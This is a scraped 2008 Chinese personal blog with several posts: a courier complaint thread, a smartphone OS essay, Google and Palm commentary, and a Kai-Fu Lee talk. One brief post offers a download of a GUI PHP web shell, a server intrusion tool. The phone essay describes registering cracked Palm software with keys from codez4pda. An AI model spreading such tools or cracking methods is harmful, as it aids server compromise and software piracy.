韵:自己上网查
我:现在不方便上网
韵:不方便上网怎么查到我们电话的
我:卖家给我查的,告诉我的
韵:你这人是不是彪
我:.... (被这冷不防的一句雷到了,怀疑是不是听叉了)
我:你说什么?
韵:(强调语气)我说你彪!
我当即挂掉电话

马上开机上网,查到丹东韵达经理的手机,要求就这个员工的言行,给我一个答复,否则向上海韵达总部投诉...... 经理的回答也很强悍:没事儿,你要投诉就投诉吧

太极品了!

我立马按照网站公布的总部投诉电话打过去...... 无人接听,打了20几个,一直没人接,我打遍6个总部电话,除了其中1个说投诉不归他管之外,其余都是24x7的无人接听

我被雷焦了......

我想到了3.15,结果上去一看,原来韵达早就是人神公愤了.... 不信你去百度,试试“韵达 投诉”或者“韵达 垃圾”......

吃堑长智吧,这辈子不会再用韵达了,请朋友们记住这个强悍的韵达“快”递



1.jpg


2.jpg



还有留言呢

最新回复

  • 咖啡因 (2008-6-30 19:11:37)

    被雷了~~~第一次知道有人这样和客户说话

  • 闲慌 (2008-6-30 19:15:25)

    韵达我记得是在哪里的门面呢 ?

  • liaodong (2008-6-30 19:17:01)

    `暴光了好!

  • 翱翔 (2008-6-30 21:52:27)

    你这还算是好的 我买的东西 让他们发 结果发给我的是空盒子 东西被他们偷了 后来通过与卖家联系 查到在中间环节 就让他们把东西给偷了 垃圾快递

  • 手气绣儿 (2008-6-30 22:01:08)

    QUOTE:

    原帖由 闲慌 于 2008-6-30 19:15 发表
    韵达我记得是在哪里的门面呢 ?
    海鲜一条街街口

  • 手气绣儿 (2008-6-30 22:06:34)

    还有天天快递呢
    天天快递在丹东黄了
    我是7号发的件,本想10号应该到了吧
    然后说是快递公司黄了。等发件公司给沈阳公司发信翰委托转发邮政
    这一转转了大半月,我是28号收的件,走平邮也不至于这速度还收着快递的费用
    让人无语
    不过丹东的圆通快递又开了。想起去年圆通黄的那时候更惨,还找朋友在沈阳提的单。
    哎。
    丹东准成点的就是顺丰了,但是价钱也让人难以接受。不过倒付走它可以。哈哈
    申通还算不错啦。起码江浙沪可以打折不是
    在就是宅急送了。不错。天上的地下的都能走。速度也可以
    不过我买登山杖的卖家每次发件都走韵达,速度都算可以。慢就4天,快就3天。
    但是态度不是很好,有几次是我下楼拿的,给你送上楼吧,就像要赶飞机似的。火烧腚了
    一般淘宝上卖家主要圆通申通还有宅急送。我才知道宅急送跟淘宝有合作关系,你要是有交易号走件就能便宜些,一些快递单上有机打淘宝字样的都是这种。但是卖家很少给你便宜,这都是送件的说滴。

    [ 本帖最后由 绣气手儿 于 2008-6-30 22:57 编辑 ]

  • Kazen (2008-6-30 23:46:42)

    QUOTE:

    原帖由 绣气手儿 于 2008-6-30 22:06 发表
    还有天天快递呢
    天天快递在丹东黄了
    我是7号发的件,本想10号应该到了吧
    然后说是快递公司黄了。等发件公司给沈阳公司发信翰委托转发邮政
    这一转转了大半月,我是28号收的件,走平邮也不至于这速度还收着快递的费 ...
    宅急送在网上下单的确有优惠的
    其实圆通有最好的网络, 本可以做国内快递业老大的, 可惜买卖真的是分人做的, 态度差终究是败了, 丹东圆通就三两个人硬撑着巴掌大的门脸, 态度还极差, 听说被中通收了, 我看这个韵达也差不多了
    ps: 快递走到付的公司, 有点那个了.... 呵呵

    [ 本帖最后由 Kazen 于 2008-6-30 23:48 编辑 ]

  • 兔之夭夭 (2008-7-01 00:18:35)

    顺丰吧,态度也好,还有运单扫瞄件上传,各方面都不错。

    丹东不是有个佳惠尔吗?

  • Kazen (2008-7-01 00:49:06)

    QUOTE:

    原帖由 兔之夭夭 于 2008-7-1 00:18 发表
    顺丰吧,态度也好,还有运单扫瞄件上传,各方面都不错。

    丹东不是有个佳惠尔吗?
    佳惠尔和汇通是一家吧, 经理姓孙, 个人感觉也属垃圾一列, 连个查包裹的网站都没有

    顺丰无可否认是现在最好的, 网络和速度远优于同价位的EMS, 而且非常正规, 但价格也摆在那了

  • 走猫步的鱼 (2008-7-01 06:46:20)

    呵呵。。这些快递我也都有用过。真是分地方。。
    和网上的买家和卖家交流过,在河北受客户欢迎的快递公司里居然就有韵达,而申通是他们认为不好的。都是申通的服务质量差。而我恰恰很喜欢用申通。而且用的不错。。
    顺丰是在所有地方都口碑很好的。还有宅急送。。中通嘛。。比较中性。不好不坏。。但价格很便宜。。
    那个天天。。开始是停业整顿。。再后来。。就没影儿了解。。
    韵达我也有用过。。便可能比较幸运吧。没有遇到楼主这样的事,而且服务态度还不错呢。。呵呵。。。

  • yuan_pt (2008-7-01 12:48:26)

    记住了
    一定不用韵达了

  • yuan_pt (2008-7-01 12:48:29)

    记住了
    一定不用韵达了

  • 简约 (2008-7-01 15:00:58)

    终究会有不强悍的时候。  

  • 东港小伙 (2008-7-01 16:32:21)

    根本都没有听说过,更别提用了

  • 金豆 (2008-7-01 20:45:11)

    QUOTE:

    原帖由 绣气手儿 于 2008-6-30 22:01 发表





    海鲜一条街街口
    搬家了,现在不知道哪去了?大概也快黄了吧。

  • 幽谷精灵 (2008-9-06 15:24:39)

    我也用过好几个快递了,感觉都有不好的地方。。

    宅急送,给总机打电话,我只记得一个女的态度特别差,感觉好像不想做生意似的,但是直接给业务员打电话态度孩可以。

    顺丰确实好,但确实贵了点,我只收过邮件,没怎么寄过。

    其他的快递我觉得档次都一般,全国性来说是有可能很大,但丹东代理点的我觉得态度服务都非常跟不上。
    有的时候,比起邮局的人还差,现在邮局的人态度也慢慢改变了。

    现在快递产品也是经销,代理出来的。。。。所以,不同地方的同一个快递的服务肯定都不一样了。

  • jlhymall (2008-9-07 20:13:10)

    顺丰最好,从总部到丹东本地都最好
    接触过的,中通在丹东的代理最差,现在说来是06年秋天的事:
    也是网购,到货后,让我自取.我就不太爽,明明送货上门,为啥自取.后来着急啊,就去了.我人到了,还没人,这不忽悠我嘛.我就打电话问那你们什么时候能 有人,当然态度上会严厉些,但我没骂人.然后电话那端沉默几秒,突然爆发,说要揍我,然后用我们丹东本地骂人的话骂我,我一下子没反应过来,很少见啊
    然后我也不爽啦,就在电话中跟他嚷起来,最后,那家伙还扬言回丹东后,要揍我.这都什么事,合着我花钱让人打我.......
发帖者 时间: 没有评论:
标签:

2008年12月4日星期四

关于黑莓 关于全键盘 关于操作系统

本文转自Maxpda.com
如需转载,请注明出处

原作者:faytoday

最近好多同学喜欢上了BlackBerry,找出一篇文章看看

由于开发网站的关系,最近每天都要在网上收集关于黑莓的资料,或者说是新的电子产品的资讯。我发现了一个有趣的现象!
这个现象其实bber都发现了,就是 全键盘 !

全键盘绝对是因为黑莓的成功而走到了第一线,虽然palm也是,但个人感觉黑莓的作用更大。然而,全键盘就是黑莓的全部?或者说nokia代表的塞班阵营也好,wm阵营也好,一波又一波的全键盘机型,难道真的能改善用户的体验吗?

我想就此发表一下自己的看法。

如此的模仿与复制,知识说明他们在现有操作系统上无法得到提升的一种转移视线的做法!
他们如此做的目的是想告诉你 黑莓能做的,我也行!
而事实是否真的如此呢?

我说:绝对不是。

关于全键盘。 全键盘的好处是可以比传统键盘更快的输入,对于商务或者电子爱好者来说,按键数目不是问题,速度和效率才是关键,所以全键盘在这些群体中得到认同是可想而知的。
获得了全键盘就是获得了更好的输入体验! 没错。

除了全键盘。
操作系统。
我对手持的操作系统相当感兴趣,从ngage时代的s60 到 838的wm 再到 7130的黑莓 ld 650的palm。我觉得自己还是有点发言权的[还有最近的iphone].
每一个平台都是丰富的,而且相当有个性的,并不能被取代。

塞班系统依托nokia航母的基数优势很长一段时间处于垄断地位,但用户应该很清楚一点,塞班的重点是在多媒体市场。首先塞班是第一个真正意义上进入手持 mp3及视频的系统。从其s60系统诞生的那天起,强化它本身的媒体功能成了首要任务。从疯狂升级的摄像头可以看到,nokia是多么想要摆脱日系手机拍照王的影响。没有突破的处理器配置,和程序运行速度。毫无变化是我对这个系统运行过程的感觉。速度相当的慢,拖沓,和让人担心。然而nokia很清楚他们的用户是不在乎这些的。只要有音乐就行!
塞班选择了全键盘,他说我其实也能很快的发邮件。的确结合了exchange的塞班确实在商务方面提升了一大步,这一大步是因为和微软结合而不是和键盘结合!
key word: 多媒体

wm系统,是我反复尝试反复放弃的系统。原因很简单,我终于明白了我要用的是手机而不是mini电脑。
wm系统的给人的第一印象很牛!小样竟然吧windows操作系统搬上手机了!其实他们的初衷就是如此,作为windows这个桌面系统的延伸,wm是想要把windows的体验扩展到你手持设备上。不幸的是wm相对与其他的系统对硬件提出了更高的要求!你会发现wm平台手持的升级速度是最快的。也是最激烈的,新系统的绝大多数功能会要求你有更强的处理能力--最新的设备!
在软件上面,微软一直致力于将桌面系统所能呈现的功能一一复制到wm上面。轻量级的软件上面我可以说,他们做到了,而且做的漂亮。但是对于重量级的软件来说,微软还是有其不足的,对于office2007的支持,据我所知是palm先做到的。
面对强大的wm系统,使用者也必须十分强大!首先,头脑要强大,因为wm毕竟不是桌面系统,面对几乎相同的界面,你要有不同的思考方式;神经要强大,面对沙漏你要怀有一颗宽容的心;手指要强大,发短消息或者调用功能有的时候需要你花费更多的协调能力,以往简单的事情变得强大的同时也变的复杂。
微软向我们证明了他可以在掌上给你如同桌面一样的功能的同时,忘记给我们鼠标和键盘!
微软选择了全键盘,告诉我们黑莓有的我们一样也不缺!
微软足够强大,其自身的软件可以构建起不亚于BES的系统,然而使用者必须知道其过程才能通过自己的配置达到像BES一样的效果。
可喜的是,从微软的每一次改革来说,他正朝着人性化的角度来思考这个日益臃肿的系统。为微软祝福!
key word: 强大

palm,对于这个系统的描述我尽可能的低调,尽可能的说写缺点,尽可能的说些批评的言辞,因为这是我最爱的系统。关于缺点让我先喝杯水好好想想回来继续写。。。。最近认识的mclane兄弟让我对palm有的新的认识。我不认为这是一个单纯的系统,而是一个人性化的手持设备。palm的初衷很简单,就是帮你完成任务。也可能由于这个初衷,他变得很专一,很多人知道的单线程。其实撇开da 和可后台的程序来说,他的确是挺单细胞的。也有一些人因为这个原因就直接否定了它。。。
越发的深入使用,越来越感觉感觉到这个系统的魅力。
软件众多,多到匪夷所思,虽然现在新软件的数量在缩小,但是已经够用了,用mclane的话说,如果公司允许的话他可以不用电脑只用palm来完成日常工作,[感兴趣的朋友可以找他讨教一下,个人在此表示有极高的可信性]软件的功能分的很细,我举一个例子:mclane[本来是想写简写mc的因为是学医的这个mc正好代表了某种生理现象所以,为了表示对mclane的尊重,我打消了这个念头]接着说,mclane用 explorer 传给我一个软件,由于这个软件是没有破解的所以我需要一个key...然后我打开了codez4pda 查到了这个软件的key 信息,用multiuserhack 换了这个软件的用户名[codez4pda直接复制]然后打开软件用前面的key注册了软件,无限制的使用了。palm上面的软件在设计的时候一般会很简单,但组合在一起会非常强大,有点像蚂蚁;更可贵的是他们的人性化程度相当的强!而且普遍如此。至于如何之人性化我想也只有用过的人才有这样的震撼。
palm[treo...要死了忘记写treo了。palm是一个平台,treo才是此平台的手机系列]是一个硬件更新很慢的手机,摄像头像素低,不适合偷拍。电池时间一般挺长的,不适合单位偷电。个头倒是不小可以防身。。。
palm选择全键盘,因为这样更高效率的完成任务符合它的系统特征。不管是快捷键调用还是,输入选词,都是相当之厉害!
palm 没落了,由于这个平台失去了新的增长点,和活力,我们看到的是现在夕阳西下的palm。扼腕叹息至于我们还是吧希望放在又延期一年的全新的palm os on linux上面吧。。。OMG!
key words: 人性化 丰富

黑莓!
小组的logway是一个不折不扣的黑莓迷而且和我聊了很多有关黑莓历史的背景知识,其实我也是!从黑莓的历史来看黑莓其实就是一个邮件工具。
不要打我!至今黑莓还是一个邮件工具!这是他的主要任务。曾经请教了一个同事,做hosting业务的。他告诉我有些外企进来就黑莓,其他的不考虑的,原因很简单。作为企业来说BES整合了他们所有的关键业务。一旦BES环境搭建完成,个人终端的一切PIM信息就与服务器,主机同步,这个动作现在微软还不能做到完全。[详细的我们可以私下交流,不是这几句能够说完的],专有的通道,这个是其垄断[有点夸张了]优势。一条专用的通道代表的是可靠,不受其他因素影响,而这点对企业来说是相当有吸引力的。
作为邮件工具,黑莓选择了全键盘,这个是必然的。效率第一,速度第一!
可是这里的绝大部分bber并不是企业用户,那么为什么我们选择黑莓呢? 除了企业应用以外黑莓还有什么优势呢?
由于应用与企业级的服务,黑莓有其高可靠性。
信号ok! 电力持久! 这两点上面黑莓做的比其他的手机好的太多了。
PIM管理。黑莓本身的商务血统,仰仗与其内置的简单而使用PIM。我们可以在不使用第三方软件的情况下获得优秀的PIM管理。而其系统的查询功能更是登峰造极[让我想到了mac的放大镜]只要有蛛丝马迹,你就能够找到讯息的藏身之处。
黑莓其实在手机这方面还是刚刚起步,[手机现在的概念是 电话机+摄像头+mp3....OMG 从8100开始起,我们说,这小莓子有点像现在的手机了。。。hoho]
但是RIM 的起点很高,我觉得这个才是黑莓吸引我的地方。
从8100的身上体现出了以往任何手机都没有的现象,轨迹球,不断的会有新的功能突破限制。这些其实并不意外,借助高额的企业业务的利润,RIM的开发团队不是吃素的,光从将全键盘市场做大,和轨迹球市场诞生,这点来看,RIM是下了血本的。我们目前应用的rom的版本还很低,个人估计RIM认为还没到时候发布强力ROM!原因是目前多媒体市场只是他的实验区。不过面对如此成功的实验,其后续机种的推出我们可以看到这个方向变的明显!那么关于强力rom或者说是终极ROM个人认为是laucher的ROM。看过身边sheep1997的界面,很乱,图标很多没有分类,这不是一个正常的多媒体,多用途智能机所应该拥有的界面!所以目前RIM认为黑莓的应该还应该是单纯的,排除第三方的[取得正式的第三方的开发工具的费用在每个授权100美元。。。如果我没记错的话]一旦RIM觉得大规模的软件应用成形,那么强力的综合化的强力ROM就一定会出现。[其实从8100的初始界面我们看到,RIM已经试图让日常应用变的简便了]
在RIM的强力ROM推出之前,我认为我们现在还只是在其初级阶段游走。但试想,如此初级的阶段就可牵起万丈波澜的黑莓,其前途岂可限量?
从各种方面现实出来的情况是,RIM 很注重简约,很注重稳定,很注重互联体验的,[另外国内商家能很好的控制价格]所以我对这个公司是十分期待的!
所以我说:小莓才露尖尖角,日后大有看头!
key word: 企业级 成长

iphone!
个人感觉iphone的主题是多媒体和互联网,而不是手机本身,于是他在媒体上面的表现比目前市售的多媒体手机要好很多也就不奇怪了。给一个非常低调,非常客观的评价,nokia sony 三星 在这几年苦心创造和经营的所谓的多媒体手机的假象在iphone诞生的那天起,被无情的戳穿了。
多媒体的概念被晃了很多年,把很多媒体放在一起就是多媒体的时代已经结束,在后iphone时代里面,重点不是多,而是捏合。如何将这些结合起来,并使人们享受,我想,那些手机制造商应该要学学了。
相对于wm平台上面的苦涩,塞班平台上的呆滞,iphone上面的多媒体体验是轻快,幽默,典雅的。
你不经得到了itune你还得到了更多!
就向蔡依林唱的[本人不是其崇拜者,只是播放率太高了] 旋转跳跃我闭著眼 尘嚣看不见你沉醉了没 故事刻画在旋转的指尖 是谁在痴痴的跟随
随着指尖的滑动,你发觉你是在控制着你的手机,这种体验很新奇。你会感觉他是活的。
弹一下手指,乐曲的列表开始飞速上升,出现了我要的歌曲,立刻点住,就像一个急刹车!你看我多帅!

网络体验也是前所未有。
其实我们一直在寻找一个比较好的掌上网络体验。感谢伟大的微软给我开了一个好头,将ie搬上了手机,同时也给我们在黑夜中竖起了灯塔,你永远不能将掌上浏览器做的像ie这么差,这么。。。。桌面化。当我第一次在wm平台上面看到其ie的时候,我怀疑我的眼睛,难道我要在这么小的屏幕上做我在19寸屏幕上做的事情?所以很多情况下我们都opera了。预览放大,我们乐此不疲。
苹果与微软不同,后者是致力于挑战自己,专做吃力不讨好的事情,制定行业基础标准的专家和领头人。苹果是比较艺术和天真的,并且你能在iphone上面体验到这一点。就像一个孩子,调皮的划个框,然后框里面的东西就放大了,于是我扭了屏幕一下,又缩小了。将屏幕翻转,文字变大了,看得更爽了。就是这样,你自己决定要看的内容,自己去巧妙的调整他。这就是新的掌上哲学。
iphone真的是创造了一个新的标准和方式,一个在掌上获得信息并享受。

iphone所具有的众多特性是与目前这个市场形成巨大差距的。这是一个好消息,因为各家厂商为了挽回失地将会全力研发更人性化的系统。我们的新掌上时代开启了。
iphone:上帝 耶稣 基督 圣母玛丽亚 女窝 盘古。。。。 a whole new world
key word: iphone


最后做一下总结。在后iphone时代里面 nokia sony 三星,依然拥有这庞大的但在日益缩小的用户基数,wm依然有Micro$oft 撑腰,黑莓还有专用通道和创新精神,[说到创新精神,我想到了nokia 的n7x系列,换一个盒子可以卖的这么火,实在也是一种创新啊].希望各家都能走好,走下去。 。。。。忘了palm了,兄弟要坚持住,我们会支持你的,因为1500元的650实在是超值!

忽然想到了微软和苹果的博弈,这次的场地是手机,目前我还看不出微软除了在机体普遍待机时间短,软件运行速度慢,性价比低,信号不好,操作系统臃肿以外还比iphone差了哪些。所以 我看好你哟 这次一定要漂亮的摔个跟头哦!

全文完。
发帖者 时间: 没有评论:
标签: , , , ,

Google给我们带来了什么?

一、Google用搜索改变了世界

Google
不能说搜索技术是Google的发明,但用搜索改变世界却是Google的发明。大例子不用举了,只说我自己的经历。

当我要在博客上引用一篇旧文章而需要查找其url时,我会直接Google,比如”善用wink“。因为这样做很有效,准确的搜索词,加上Google识别原创的精精准搜索技术,通常第一条即得结果。

我是读过槽边往事很久之后,才注意到hecaitou这个域名的。也就是说,我访问其网站,都是Google “槽边往事”,从来没用过、注意过网址。或许有更多人也用搜索代替域名和地址栏了吧?也就是说,同样有人只知“善用佳软”,而面对xbeta则一头雾水。看来以后要注意这方面了。

二、Google以行为确立了道德规范和价值准则

无论是简单的一句“不作恶”,还是Google十诫,都值得我们三思再三思。只是阅读,你可能会有同感;但只有面临人生选择时,甚至事后再读,才明白它的价值。难道哲理都是如此吗?

1. 一切以用户为中心,其他一切纷至沓来 Focus on the user and all else will follow.
2. 把一件事做到极致. It’s best to do one thing really, really well.
3. 快比慢好. Fast is better than slow.
4. 网络社会需要民主. Democracy on the web works.
5. 您不一定要在桌子前找答案. You don’t need to be at your desk to need an answer.
6. 不做坏事也能赚钱. You can make money without doing evil.
7. 未知的信息总是存在的. There’s always more information out there.
8. 对信息的需求无所不在. The need for information crosses all borders.
9. 不穿西装也可以严肃认真. You can be serious without a suit.
10. 仅有优秀是远远不够的. Great just isn’t good enough.

但实际上,上面的所谓“十诫”中文内容是网友翻译,谷歌的翻译是Google发现的十大真理,部分文字也略有差异。如果你认为英文版更原汁原味,please visit Google Philosophy | Ten things Google has found to be true。相比中文,英文更平实直白(比如十大真理不过是 things found to be true),但更为鲜明。

当我们迷茫时,请记住第1条;当我们面临诱惑时,一定不能忘记第6条;当我们自满时,一定记住第2、7、10条。

三、Google教导开发者如何创新、改进而不迷失

最近Google黑板报文章《搜索质量(续)》 提到,『当朋友们听说我现在正致力于谷歌搜索的用户界面时,他们的一个共同反应就是:“你干了什么?界面从未改变过!”然后,他们怀疑地看着我,并告诉我 说,不要把好东西糟蹋了。谷歌现在的样子就已经很不错了:页面朴实,反应迅速,简单干净。』这正是关键所在!“我们一直在改变,但又从来没变过”——这貌 似矛盾的一句话,出自夺得2008欧洲杯冠军的西班牙队教练。我不明白足球,但明白了这句话。

还是上一篇《搜索质量(续)》提到,搜索的目的是“尽快让您看到您想要的网页”,而不是展示搜索技术多先进、搜到的数量多巨大,更不是把广告塞给用户。这句话,应该和Google十诫对照阅读,很值得百度注意。

Google的创始人之一Larry Page也说过:完美的搜索引擎需要做到 确解用户之意,切返用户之需。(”The perfect search engine, would understand exactly what you mean and give back exactly what you want.”)

为了这一目标,他们要用技术应对错误拼写(Google面对的可是多种语言),既包括搜寻者的错误输入,也包括网页的错误拼写。要用最精简的方式 (网页标题、2行摘要、url)来展现搜索结果。不仅如此,为了帮助读者更容易识别,还通过分析技术,为没有标题的网页生成标题,让2行摘要不是网页前2 行,而是关键词附近内容……众多改进,用户在享受但可能从来没有意识到的改进,在《搜索质量(续)》中介绍了很多。

四、Google带来的价值比我们期望更多

如果一件劣品在广告中宣称十大优点,可能只有一条是真的。但一件精品宣称有十大优点,则很可能有第11项、12项……甚至第100项或者超出数量所能概括的价值点。并且,这些价值点可能是我们在用了多年之后才会发现。历经考验的Total CommanderVim当然是这样的经典,但新诞生的Chrome也给我这种震惊。不用说话,看图即可:滚动条上的黄色“频谱”!
Chrome

十周岁的Google依然年轻,将和我们一起走向更美好的未来!
发帖者 时间: 没有评论:
标签:

Palm 季收惨淡,前景暗淡

不久前 Palm 才宣布裁员,以便精简组织、削减开支。根据 Palm 的 Q2 2009 的财务计划显示,预期营收在 1.9 亿美元到 1.95 亿美元,听起来很多? 但却远比华尔街预估的 3.31 亿美元低得多。虽然这个极大的落差可以归咎于景气不佳,但也严重影响到产品销售,因为消费者对 Palm 更没信心了。Palm CEO Ed Colligan 仍强调可以如期推动下一代产品计划,不过在我们看来,Palm 动作再不快一点,搞不好在新产品推出之前就会倒掉了。
发帖者 时间: 没有评论:
标签:

见过的几个NB服务器Server

看图说话:








发帖者 时间: 没有评论:
标签: ,

2008年12月3日星期三

纪念

2008年12月3日,54********
发帖者 时间: 没有评论:
标签:

2008年12月2日星期二

国外gui版phpshell

来源:鱼化石's blog

phpshell

下载地址:webshellphpgui.rar

发帖者 时间: 没有评论:
标签: , ,

谷歌李开复:我的传奇人生源于十句箴言

一个成功的人如何定义成功?一个成功的人如何从成功中获得启发?这个命题无疑会让许多人充满了悬念与期待.2008年11月30日下午,北京青年报大厦的 20层大会议室迎来了北青教育大讲堂活动开办以来最爆满的盛况,谷歌全球副总裁、大中华区总裁李开复的到来,让许多人对于成功的定义有了崭新的认识.

对于成功,不仅仅是对名利的追逐,不应该完全用世俗的价值观去衡量成功与否,而是实现自己的价值,关爱自己身边的人,给这个世界带来更多的影响力,用自己 的力量去感染周围的磁场.当你某一天逝去的时候,你的墓志铭上应该撰写的是对你最公平的评价.成功的定义应该是多元化的.

在 这个下午,谷歌大中华区总裁李开复用平实而不失幽默的语言,讲述了自己成长中的很多故事.和许多人的成长经历相似,他的成长中也有儿时的淘气顽皮,学生时 代的疑问与困惑,有获得成功时的泪水与喜悦,也有经历困难与挫折时的蹉跎与彷徨.甚至有经历人生最低潮时期的痛苦与煎熬.但是与众不同的是,李开复在成功 中收获了经验,在失败中得到了成长.他把富有传奇的人生经历浓缩成为十句具有启发性的箴言,在如同与你交谈般的娓娓道来中,将这种宝贵的人生经验像冬日暖 阳一样,洒满了整个房间.

●成功箴言之一:
自信不失谦虚 谦虚不失自信

李 开复1961年出生于台湾,母亲在43岁高龄时生下他前,被医生数次劝阻.因为医生透露,如此高龄的产妇很可能生下白痴.但是母亲不顾一切劝阻生下了这个 幺儿.这个幺儿在母亲的极度宠爱下自由自在地成长着,喜欢做很多恶作剧.把家里所有的钟表调慢一小时以便晚上床睡觉.把邻居池塘里的水放干以证实邻居池塘 里并没有100条鱼.这一切母亲都只是报以宽容的一笑.但是母亲不允许孩子傲慢和目中无人.

当5岁的李开复得意洋洋地对邻居阿姨表示“上 小学以后就没有见过99分”后.母亲不允许这样的狂放存在于孩子身上,有史以来第一次打了开复.母亲告诉他,“不只要好好学习,还要改掉骄傲的毛病.自夸 是要不得的.谦虚是中国人的美德.”母亲总是不失时机地把做人的道理告诉开复.这一次强烈的记忆,使得开复懂得如何在谦虚和自信中保持平衡,而不会在自卑 或自负中跌倒.

●成功箴言之二:
天赋就是兴趣 兴趣就是天赋

李 开复11岁留学美国之后,一直在美国成长.1972年,他进入了美国哥伦比亚大学学习“政治科学” 专业.然而两年的学习让他知道自己的兴趣并非在政治方面.学习的枯燥经常让他在课堂上昏昏欲睡,学习成绩也不尽如人意.但是,他发现他在选修的计算机课 上,有着惊人的天赋.往往是别人还在苦思冥想如何写出程序时,他早就把程序写完而无所事事.后来,他发现他像发疯一样爱上了这门学科.因此,在大学二年级 时,他自己做出了一个惊人的决定,“转系!”这意味着他将从一个全美排名第3的专业转到一个毫无名气可言的专业.但是,他听从了内心的选择,还是选择了计 算机专业.而这个决定,改写了他一生的轨迹.

●成功箴言之三:
思考比传道重要 观点比解惑重要

李 开复以哥伦比亚大学计算机专业第一名的成绩毕业以后,顺利进入匹兹堡的卡内基·梅隆大学就读计算机专业的博士.在读博士之前,他的系主任Haberman 就告诉他,读博士的目的,就是要做出世界上一流的博士论文.至少在本领域是世界顶尖的.这句话让李开复十分震撼.然而,下面一句话,让他受益更 深,Haberman说,“做出一流的博士论文,也不是读博士的最终目的.而是你在读博士的过程中,获得一种思考的方法,而这种方法将使你在任何一个领 域,都获得顶尖的成功!”而李开复的努力证实了这种说法.李开复关于统计学方法做出的语音识别博士论文至今还是语音识别产品的理论基础.而李开复也在博士 生涯中,学会了解决问题,拥有了战胜困难的勇气.

●成功箴言之四:
我不同意你 但我支持你

李 开复在读博士期间选择的研究方向是“语音识别”.师从博士生导致罗迪.罗迪教授鼓励李开复用专家统计的方法来研究语音识别,而李开复在这个领域经过了一番 研究后,发现语音识别用这个方法可以获得特定语者95%的语音识别率.李开复把整个研究过程写了一篇论文.一经发表,得到了很正面的回馈.但是他最终发 现,专家系统是有严重局限性的,无法延伸到做不特定语者的语音识别.他认为有数据的支持的统计模式是唯一的希望.当他把想法告诉导师,罗迪告诉他,“我不 同意你,但是我支持你!”这样的说法让李开复备受感动,成就了李开复博士论文的成功.他的论文当年被评为《商业周刊》最杰出创新.

●成功箴言之五:
挫折不是惩罚 而是学习的机会

李 开复在博士生生涯里,成绩依然优秀.他用统计学做出的语音识别率大大地提高了,而博士论文发表在国际期刊上,让全美的科技界震惊.这样一个明星学生可以说 在卡内基·梅隆里没有什么忧愁可言.然而,一次暑期课程让他经历了不小的挫折.1983年暑假,李开复得到了暑期工的工作.

其任务就是教宾夕法尼亚州60个最聪明的高中生计算机课程.李开复自己对那段时光非常享受,每天忙碌地备课,还想出各种教学方法.但是,他领取薪水的那一瞬间看到学生的评语,才知道学生认为,“李老师的教学就像催眠曲!”这样的评价无疑使得李开复备受打击.

然而,李开复并没有气馁.他把失败当成了学习的机会,因此获得了成功.他在此后的生涯里,尤其是回到中国以后,做了上千场的演讲.这无疑得益于学生时代的练习.

●成功箴言之六:
创新不重要 有用的创新才重要

在 苹果和SGI李开复度过了八年科学家到产品副总裁的路程.在这段路程上,他有许多成功,例如苹果的QuickTime,但是在SGI他碰到了巨大的挫折. 他的团队发明的三维浏览器,在市场上失败,整个团队和产品被公司廉价卖掉.这时,他又发挥了“从挫折中学习”的反省.他理解了,仅仅有科学家的“新”、“ 酷”的创新是不够的.创新必须是针对用户的,必须是有用的.做产品的管理,必须把用户放在第一位.李开复1998年夏天回到中国,在中国开创微软中国研究 院.这时,他把这个教训带入中国团队.

●成功箴言之七:
完美的工作 成长兴趣 影响力

2000 年,李开复被调回微软总部成为微软全球副总裁.几年工作后,他深深地体会了一个完美工作的标准,那就是自己有浓厚的兴趣,能有成长的空间,并具备一定的影 响力.他怀念着在中国研究院的兴趣,还有在刚调回美国的学习,但是他期望着有更大的影响力.当他发现谷歌将开始在中国创建时,他主动找到了谷歌CEO施密 特,并表示愿意加入谷歌.而施密特十分高兴,在一个月之后就给了李开复OFFER.李开复说,当你遇到喜欢的工作机会,不需要任何的迟疑,而需要积极主动 来争取.因为这样的机会往往炙手可热,一秒钟的犹豫你就可能与之失之交臂.

●成功箴言之八:
用勇气改变可以改变的事情

2005年,是李开复的转折年.他没有想到,一次普通换工作的经历引发了一次地震.微软的诉讼使他陷入了人生最低的低谷.对他的虚假负面报道铺天盖地而来.但是,他想到了他一生的座右铭:用勇气改变可以改变的事情,用胸怀接受不能改变的事情,用智慧分辨两者的不同.

于 是,他全力以赴地投入了这场战斗,不再理会那些不能改变的谣言.将从微软提取的30万份邮件资料中找寻有利的证据以证明自己的清白.经过两个月的努力,法 庭同意李开复到谷歌工作.最后,当李开复回到媒体面前开始工作时,他发现,没有一个记者还提问与诉讼有关的问题,因为作为官司的胜利者,媒体不再相信那些 谣言.

●成功箴言之九:
做最好的领导 让员工做有兴趣的事

谷 歌公司聚集着世界上最天才的工程师们.如何管理这些“天才”,是摆在李开复面前的另一个课题.李开复非常推崇“放权”式的管理,他深知在以创意为主要生产 力的公司里,不能严格地恪守那些死板的规定.他可以让员工自己提出研究的方向.大家讨论决定.也可以让员工用20%的时间做自己喜欢的项目.他甚至可以让 员工对公司提出建议.如果合理就采纳.谷歌里自由的环境非常有名.作为管理者,他主要是在公司战略、每年的目标、合作伙伴、总部沟通上努力,其他的时间, 他更是一个企业文化的维护者、公司的发言人、员工的教练.

●成功箴言之十:
价值不是你拥有多少 而是你留下多少

什么是成功?是否拥有了名利就算成功.对此,李开复回答,你的价值不是你拥有多少,而是你留下多少.当他的一个同事赚够了钱而发现失去人生目标时,才意识到,人生的价值在于贡献,和对他人的影响.

李 开复曾经有过一个独特的梦想,就是在中国创建一所一流的,有世界影响力的私立大学.他甚至身体力行地为此多方奔走.但是最终因为种种原因没有成功.但是他 并没有气馁,而是用另外的方式实践梦想.他说:“我不能改变教育,但是我可以帮助学生.” 他给中国的大学生写信,写书,办了“我学网”,每年面对十万学生做演讲.在帮助学生的过程中,李开复看到中国大学生的成长.他说,他曾经想过自己的墓志铭 应该有科学家或者企业家的注脚.但是,他说他现在已经没有这种想法,如果他的墓志铭上有热心教育者的字样,他会感觉到内心的温暖.
发帖者 时间: 没有评论:
标签:

我的六级经验CET-6

本文转自人人英语社区:http://www.rrenglish.com
如需转载请注明出处

六级在很多人面前好象是个永远也无法逾越的障碍
今天我将为大家剖析
六级他到底是个什么玩意~!!我们应该如何来准备它挑战她~!!!
